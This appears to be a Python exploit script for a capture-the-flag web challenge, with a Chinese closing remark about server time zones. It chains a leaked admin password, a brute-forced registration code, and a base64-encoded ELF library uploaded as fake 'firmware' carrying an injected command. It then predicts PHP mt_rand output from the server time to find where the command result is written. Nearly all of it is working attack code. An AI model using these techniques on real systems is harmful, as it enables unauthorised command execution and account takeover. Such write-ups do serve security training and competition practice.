AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAByAAAAAAAAAGFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWEAAAAAARsDOyAAAAADAAAAFO///zwAAABk7///ZAAAACnw//98AAAAFAAAAAAAAAABelIAAXgQARsMBwiQAQAAJAAAABwAAADQ7v//UAAAAAAOEEYOGEoPC3cIgAA/GjsqMyQiAAAAABQAAABEAAAA+O7//wgAAAAAAAAAAAAAABwAAABcAAAApe///3YAAAAAQQ4QhgJDDQYCcQwHCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADARAAAAAAAAAAAAAAAAAADwEAAAAAAAAAEAAAAAAAAAfAAAAAAAAAAMAAAAAAAAAAAQAAAAAAAADQAAAAAAAACsEQAAAAAAABkAAAAAAAAAAD4AAAAAAAAbAAAAAAAAABAAAAAAAAAAGgAAAAAAAAAQPgAAAAAAABwAAAAAAAAACAAAAAAAAAD1/v9vAAAAAGACAAAAAAAABQAAAAAAAACwAwAAAAAAAAYAAAAAAAAAkAIAAAAAAAAKAAAAAAAAAJIAAAAAAAAACwAAAAAAAAAYAAAAAAAAAAMAAAAAAAAAAEAAAAAAAAACAAAAAAAAAGAAAAAAAAAAFAAAAAAAAAAHAAAAAAAAABcAAAAAAAAAcAUAAAAAAAAHAAAAAAAAAIAEAAAAAAAACAAAAAAAAADwAAAAAAAAAAkAAAAAAAAAGAAAAAAAAAD+//9vAAAAAGAEAAAAAAAA////bwAAAAABAAAAAAAAAPD//28AAAAAQgQAAAAAAAD5//9vAAAAAAMAAAAAAAAAAAAAA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')


class php_rand():

    MT_RAND_MT19937 = 0
    MT_RAND_PHP = 1
    php_N = 624
    php_M = 397
    php_left = 0
    php_next = 0
    php_state = [0] * (php_N + 1)
    php_mode = 0

    def __init__(self, seed, mode=0):
        self.php_mt_srand(seed)
        self.php_mode = mode


    def seed(self, seed):
        self.php_mt_srand(seed)


    def rand(self):
        return self.php_mt_rand()


    def hiBit(self, u):
        return u & 0x80000000


    def loBit(self, u):
        return u & 0x00000001


    def loBits(self, u):
        return u & 0x7FFFFFFF


    def mixBits(self, u, v):
        return self.hiBit(u) | self.loBits(v)


    def twist(self, m, u, v):
        return m ^ (self.mixBits(u, v) >> 1) ^ ((-self.loBit(v)) & 0x9908b0df)


    def twist_php(self, m, u, v):
        return m ^ (self.mixBits(u, v) >> 1) ^ ((-self.loBit(u)) & 0x9908b0df)


    def php_mt_initialize(self, seed):
        state = self.php_state
        N = self.php_N
        state[0] = seed & 0xffffffff
        for i in range(1, N):
            state[i] = (1812433253 * (state[i - 1] ^ (state[i - 1] >> 30)) + i) & 0xffffffff
        self.php_state = state


    def php_mt_reload(self):
        self.php_left = 0
        state = self.php_state
        N = self.php_N
        M = self.php_M
        p = 0
        i = N - M
        if self.php_mode == self.MT_RAND_MT19937:
            while i > 0:
                i -= 1
                state[p] = self.twist(state[p + M],state[p + 0],state[p + 1])
                p += 1
            i = M - 1
            while i > 0:
                state[p] = self.twist(state[p+M-N],state[p + 0],state[p + 1])
                p += 1
                i -= 1
            state[p] = self.twist(state[p + M - N],state[p + 0],state[0])
        else:
            while i > 0:
                i -= 1
                state[p] = self.twist_php(state[p + M],state[p + 0],state[p + 1])
                p += 1
            i = M - 1
            while i > 0:
                state[p] = self.twist_php(state[p + M - N],state[p + 0],state[p + 1])
                p += 1
                i -= 1
            state[p] = self.twist_php(state[p + M - N],state[p + 0],state[0])
        self.php_left = N
        self.php_next = 0
        self.php_state = state


    def php_mt_srand(self, seed):
        self.php_mt_initialize(seed)
        self.php_mt_reload()


    def php_mt_rand(self):
        if self.php_left == 0: self.php_mt_reload()
        self.php_left -= 1
        s1 = self.php_state[self.php_next]
        s1 ^= (s1 >> 11)
        s1 ^= (s1 << 7) & 0x9d2c5680
        s1 ^= (s1 << 15) & 0xefc60000
        self.php_next += 1
        return ( s1 ^ (s1 >> 18)) >> 1


# get random string
def rand_str(length=8):
    return ''.join(random.sample(string.ascii_letters + string.digits, length))


# get method
def get(session, url):
    retry = 0
    while True:
        retry += 1
        try:
            if session:
                r = s.get(url, timeout=timeout)
            else:
                r = requests.get(url, timeout=timeout)
        except:
            if retry >= retry_count:
                print('timeout or http 500')
                exit()
            continue
        break
    return r

# post method
def post(session, url, data, files=''):
    retry = 0
    while True:
        retry += 1
        try:
            if session:
                if files=='':
                    r = s.post(url, data=data, timeout=timeout)
                else:
                    r = s.post(url, data=data, files=files, timeout=timeout)
            else:
                if files=='':
                    r = requests.post(url, data=data, timeout=timeout)
                else:
                    r = requests.post(url, data=data, files=files, timeout=timeout)
        except:
            if retry >= retry_count:
                print('timeout or http 500')
                exit()
            continue
        break
    return r

# login with username and password
def login(username, password):
    url = site_url + '/hotload.php?page=login'
    data = {'username': username, 'password': password}
    if logging: print(url)
    if logging: print(data)
    res = post(1, url, data)
    if logging: print(res.text)
    url = site_url + '/hotload.php?page=upload'
    res = get(1, url)
    if 'fileuploaded' not in res.text:
        return False
    return True

# reg with username and password
def reg(username, password):
    url = site_url + '/hotload.php?page=reg'
    if logging: print(url)
    res = get(1, url)
    show_code = ''
    show_calc = ''
    try:
        show_code = res.text.split('show_code">')[1].split('<')[0]
        show_calc = res.text.split('show_calc">')[1].split('<')[0]
        if logging: print(len(show_calc))
        if len(show_calc) != 6:
            print('invalid show_calc length')
            return False
    except:
        return False
    if logging: print("show_code",show_code)
    if logging: print("show_calc",show_calc)
    code = ''
    for i in range(1, 100000000):
        code = str(i)
        if hashlib.md5(code + show_code).hexdigest()[:6] == show_calc.lower(): break
    data = {'username': username, 'password1': password, 'password2': password, 'code': code}
    if logging: print(data)
    res = post(1, url, data)
    if logging: print(res.text)
    if '"status":1' in res.text:
        return True
    return False

# upload music [diff]
def upload_music():
    url = site_url + '/hotload.php?page=upload'
    data = {'file_id': '0'}
    music = preset_music[:0x6] + '\x00\x00\x03\x00' + preset_music[0x0a:0x53]
    music += '\x00\x00\x03\x00' + '\x00\x00\x03' + 'a' * 0x70 + '\x00'
    files = {'file_data': music}
    if logging: print(url)
    if logging: print(data)
    res = post(1, url, data, files)
    if logging: print(res.text)
    if '"status":1' in res.text:
        try:
            # n54LuyJyYLVpVO2w
            return b64decode(json.loads(res.content.strip())['artist'])[:16]
        except:
            return ''
    return ''

# upload firmware [diff]
def upload_firmware(command):
    if len(command) > 0x100: return -1
    url = site_url + '/hotload.php?page=firmware'
    data = {'file_id': '0'}
    command = command.ljust(0x100, '\x00')
    firmware = preset_firmare.replace('a' * 0x100, command)
    files = {'file_data': firmware}
    if logging: print(url)
    if logging: print(data)
    res = post(1, url, data, files)
    if logging: print("Upload: " + res.text)
    if '"status":1' in res.text:
        if 'Date' in res.headers.keys():
            print("Date Header: " + res.headers['Date'])
            return int(datetime.strptime(res.headers['Date'], "%a, %d %b %Y %X %Z").strftime("%s")) + time_zone_offset
        else:
            return int(time.time())
    return -1

# get firmware version
def firmware_version(path):
    if len(path)>0x40: return ''
    url = site_url + '/hotload.php?page=firmware'
    data = {'path': path}
    if logging: print(url)
    if logging: print(data)
    res = post(1, url, data)
    if logging: print(res.text)
    if '"status":1' in res.text:
        try:
            return json.loads(res.content.strip())['info']
        except:
            return ''
    return ''

# show result
def show_result(vuln1, vuln2, msg):
    result = ''
    if vuln1 == -1:
        result += 'Vuln 1 check: unknown.\n'
    elif vuln1 == 0:
        result += 'Vuln 1 check: fail.\n'
    else:
        result += 'Vuln 1 check: pass.\n'
    if vuln2 == -1:
        result += 'Vuln 2 check: unknown.\n'
    elif vuln2 == 0:
        result += 'Vuln 2 check: fail.\n'
    else:
        result += 'Vuln 2 check: pass.\n'
    result += msg
    print(result)
    exit()

# get flag
def get_flag():
    path = 0
    vuln1 = -1
    vuln2 = -1
    logined = -1
    if path == 0:
        # username = '1Bq2DT3j'
        # password = 'KWRpkXgHnb'
        # # res = reg(username, password)
        # # if not res: show_result(vuln1, vuln2, 'register fail')
        # res = login(username, password)
        # if not res: show_result(vuln1, vuln2, 'login fail')
        # time.sleep(3)
        # res = upload_music()
        # if res == '':
        #     vuln1 = 0
        #     show_result(vuln1, vuln2, 'leak admin password fail')
        admin_password = 'Mike84eiNxHcMVCz'
        global s
        s = requests.session()
        res = login('admin', admin_password)
        if not res:
            vuln1 = 0
            show_result(vuln1, vuln2, 'leak wrong admin password')
        vuln1 = 1
    time.sleep(3)
    guess_server_time = upload_firmware(command)
    print(guess_server_time)
    if guess_server_time == -1:
        show_result(vuln1, vuln2, 'upload fail')
    vuln2 = 0
    succ_keyword = '固件版本号:'
    if vuln2 == 0:
        for i in range(5):
            rander = php_rand(guess_server_time - i)
            path = hashlib.md5(str(rander.rand()) + '[公网ip地址]').hexdigest()
            try:
                prev_flag = firmware_version(path).encode('utf-8')
            except:
                continue
            if succ_keyword in prev_flag:
                vuln2 = 1
                prev_flag = prev_flag.replace(succ_keyword, '').strip()
                break
    show_result(vuln1, vuln2, prev_flag)

if __name__ == '__main__':
    if len(argv) != 3:
        print("wrong params.")
        print("example: python %s %s %s" % (argv[0], '127.0.0.1', '80'))
        exit()
    ip = argv[1]
    port = int(argv[2])
    site_url = 'http://%s:%d' % (ip, port)
    get_flag()

有个小细节,vps需要用对应时区的地区的vps,不然会有时间差......别问我怎么知道的.

